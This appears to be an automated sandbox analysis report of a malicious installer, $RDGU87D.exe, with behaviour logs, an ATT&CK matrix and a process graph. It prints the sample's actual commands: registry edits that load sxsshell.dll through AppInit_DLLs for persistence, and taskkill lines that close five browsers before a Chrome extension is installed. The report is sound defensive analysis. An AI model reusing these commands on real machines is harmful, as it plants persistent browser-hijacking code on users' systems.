Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\17vsRA25JVNi"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmpFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exeFile created: C:\Users\user\AppData\Local\Temp\is-U66TV.tmpJump to behavior
Source: classification engineClassification label: mal40.bank.winEXE@62/71@15/12
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\xcopy.exeCode function: 21_2_000007FEF9021110 _time64,srand,GetCommandLineA,strstr,strstr,strstr,strstr,strstr,strstr,strchr,strncpy_s,memset,WideCharToMultiByte,WideCharToMultiByte,GetFileAttributesA,FindResourceA,Sleep,memset,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,rand,memset,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,strstr,strstr,strstr,strstr,CreateFileA,WriteFile,CloseHandle,WinExec,exit,21_2_000007FEF9021110
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpFile created: C:\Program Files\ChromeExtensionJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\is-0L8M0.tmp\install.bat" install
Source: xcopy.exeString found in binary or memory: Help: %s --help
Source: xcopy.exeString found in binary or memory: Help: %s --help
Source: $RDGU87D.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: $RDGU87D.exeStatic file information: File size 1904656 > 1048576
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpDirectory created: C:\Program Files\ChromeExtensionJump to behavior
Source: $RDGU87D.exeStatic PE information: certificate valid
Source: $RDGU87D.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: archiveint.pdbGCTL source: xcopy.exe, 00000015.00000002.932059653.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000017.00000002.934179025.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 0000001C.00000002.942185615.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 0000001E.00000002.979649233.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000020.00000002.1024705770.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000022.00000002.1035316144.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000024.00000002.1068856259.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: tar.pdb source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, xcopy.exe, xcopy.exe, 00000015.00000002.932059653.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000017.00000002.934179025.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 0000001C.00000002.942185615.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 0000001E.00000002.979649233.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000020.00000002.1024705770.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000022.00000002.1035316144.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000024.00000002.1068856259.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: tar.pdbGCTL source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, xcopy.exe, 00000015.00000002.932059653.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000017.00000002.934179025.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 0000001C.00000002.942185615.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 0000001E.00000002.979649233.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000020.00000002.1024705770.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000022.00000002.1035316144.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000024.00000002.1068856259.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: archiveint.pdb source: xcopy.exe, xcopy.exe, 00000015.00000002.932059653.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000017.00000002.934179025.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 0000001C.00000002.942185615.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 0000001E.00000002.979649233.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000020.00000002.1024705770.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000022.00000002.1035316144.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000024.00000002.1068856259.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: E:\work\chrome_extension_auto_install\SetupUnpackNewRealFixReload\ExtDll\x64\Release\ext.pdb source: xcopy.exe, 00000015.00000002.932047910.000007FEF9023000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000017.00000002.934166286.000007FEF9023000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 0000001C.00000002.942180233.000007FEF9023000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 0000001E.00000002.979641480.000007FEF9023000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000020.00000002.1024700223.000007FEF9023000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000022.00000002.1035310663.000007FEF9023000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000024.00000002.1068847691.000007FEF9023000.00000002.00000001.01000000.00000008.sdmp

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\$RDGU87D.exeProcess created: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp "C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp" /SL5="$202DC,1078547,780800,C:\Users\user\Desktop\$RDGU87D.exe"
Source: C:\Users\user\Desktop\$RDGU87D.exeProcess created: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp "C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp" /SL5="$202E0,1078547,780800,C:\Users\user\Desktop\$RDGU87D.exe" /SILENT
Source: C:\Users\user\Desktop\$RDGU87D.exeProcess created: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp "C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp" /SL5="$202DC,1078547,780800,C:\Users\user\Desktop\$RDGU87D.exe" Jump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exeProcess created: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp "C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp" /SL5="$202E0,1078547,780800,C:\Users\user\Desktop\$RDGU87D.exe" /SILENTJump to behavior
Source: $RDGU87D.exeStatic PE information: section name: .didata
Source: $RDGU87D.tmp.1.drStatic PE information: section name: .didata
Source: $RDGU87D.tmp.3.drStatic PE information: section name: .didata

Persistence and Installation Behavior

barindex
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exeFile created: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpJump to dropped file
Source: C:\Users\user\Desktop\$RDGU87D.exeFile created: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpFile created: C:\Windows\System32\is-T05I8.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmpFile created: C:\Users\user\AppData\Local\Temp\is-2065N.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpFile created: C:\Users\user\AppData\Local\Temp\is-0L8M0.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpFile created: C:\Windows\system32\sxsshell.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpFile created: C:\Windows\System32\is-T05I8.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpFile created: C:\Windows\system32\sxsshell.dll (copy)Jump to dropped file

Boot Survival

barindex
Source: C:\Windows\System32\reg.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows AppInit_DLLsJump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\xcopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\xcopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\xcopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\xcopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\xcopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\xcopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\xcopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\xcopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\xcopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\xcopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\xcopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\xcopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exe TID: 2120Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\taskkill.exe TID: 1056Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\taskkill.exe TID: 1256Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\taskkill.exe TID: 2868Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\taskkill.exe TID: 1424Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\taskkill.exe TID: 1424Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpDropped PE file which has not been started: C:\Windows\System32\is-T05I8.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2065N.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-0L8M0.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Windows\System32\xcopy.exeAPI coverage: 3.3 %
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess information queried: ProcessInformationJump to behavior
Source: $RDGU87D.tmp, 00000004.00000003.930369243.0000000000374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\xcopy.exeCode function: 21_2_000007FEF90217C0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,__crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,__crt_debugger_hook,GetCurrentProcess,TerminateProcess,21_2_000007FEF90217C0
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\xcopy.exeCode function: 21_2_000007FEF90217C0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,__crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,__crt_debugger_hook,GetCurrentProcess,TerminateProcess,21_2_000007FEF90217C0
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM msedge.exe /TJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM chrome.exe /TJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM vivaldi.exe /TJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM opera.exe /TJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM brave.exe /TJump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exeProcess created: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp "C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp" /SL5="$202DC,1078547,780800,C:\Users\user\Desktop\$RDGU87D.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmpProcess created: C:\Users\user\Desktop\$RDGU87D.exe "C:\Users\user\Desktop\$RDGU87D.exe" /SILENTJump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exeProcess created: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp "C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp" /SL5="$202E0,1078547,780800,C:\Users\user\Desktop\$RDGU87D.exe" /SILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM msedge.exe /TJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM chrome.exe /TJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM vivaldi.exe /TJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM opera.exe /TJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM brave.exe /TJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\is-0L8M0.tmp\install.bat" installJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized -- "https://smashbrowser.com/welcome2.phpJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v "AppInit_DLLs" /t REG_SZ /d "C:\Windows\system32\sxsshell.dll" /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v "LoadAppInit_DLLs" /t REG_DWORD /d 1 /fJump to behavior
Source: C:\Windows\System32\xcopy.exeCode function: 21_2_000007FEF9021F90 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,21_2_000007FEF9021F90
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Windows Management Instrumentation
1
Registry Run Keys / Startup Folder
11
Process Injection
23
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
Exfiltration Over Other Network Medium11
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts23
Command and Scripting Interpreter
Boot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Disable or Modify Tools
LSASS Memory111
Security Software Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
Ingress Tool Transfer
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts1
Scripting
Logon Script (Windows)Logon Script (Windows)1
Modify Registry
Security Account Manager1
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
Non-Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Virtualization/Sandbox Evasion
NTDS11
Process Discovery
Distributed Component Object ModelInput CaptureScheduled Transfer5
Application Layer Protocol
SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
Process Injection
LSA Secrets2
System Owner/User Discovery
SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common1
Deobfuscate/Decode Files or Information
Cached Domain Credentials1
File and Directory Discovery
VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items1
Scripting
DCSync3
System Information Discovery
Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 831395 Sample: $RDGU87D.exe Startdate: 21/03/2023 Architecture: WINDOWS Score: 40 67 ocsps.ssl.com 2->67 77 Antivirus detection for URL or domain 2->77 79 Multi AV Scanner detection for dropped file 2->79 81 Multi AV Scanner detection for submitted file 2->81 11 $RDGU87D.exe 2 2->11         started        15 xcopy.exe 12 2->15         started        17 xcopy.exe 12 2->17         started        19 3 other processes 2->19 signatures3 process4 file5 65 C:\Users\user\AppData\Local\...\$RDGU87D.tmp, PE32 11->65 dropped 87 Obfuscated command line found 11->87 21 $RDGU87D.tmp 3 13 11->21         started        89 Checks if browser processes are running 15->89 signatures6 process7 file8 61 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 21->61 dropped 24 $RDGU87D.exe 2 21->24         started        28 xcopy.exe 12 21->28         started        30 conhost.exe 21->30         started        process9 file10 63 C:\Users\user\AppData\Local\...\$RDGU87D.tmp, PE32 24->63 dropped 85 Obfuscated command line found 24->85 32 $RDGU87D.tmp 5 28 24->32         started        signatures11 process12 file13 55 C:\Windows\system32\sxsshell.dll (copy), PE32+ 32->55 dropped 57 C:\Windows\System32\is-T05I8.tmp, PE32+ 32->57 dropped 59 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 32->59 dropped 35 cmd.exe 32->35         started        38 chrome.exe 14 2 32->38         started        41 taskkill.exe 32->41         started        43 4 other processes 32->43 process14 dnsIp15 83 Uses cmd line tools excessively to alter registry or file data 35->83 45 reg.exe 35->45         started        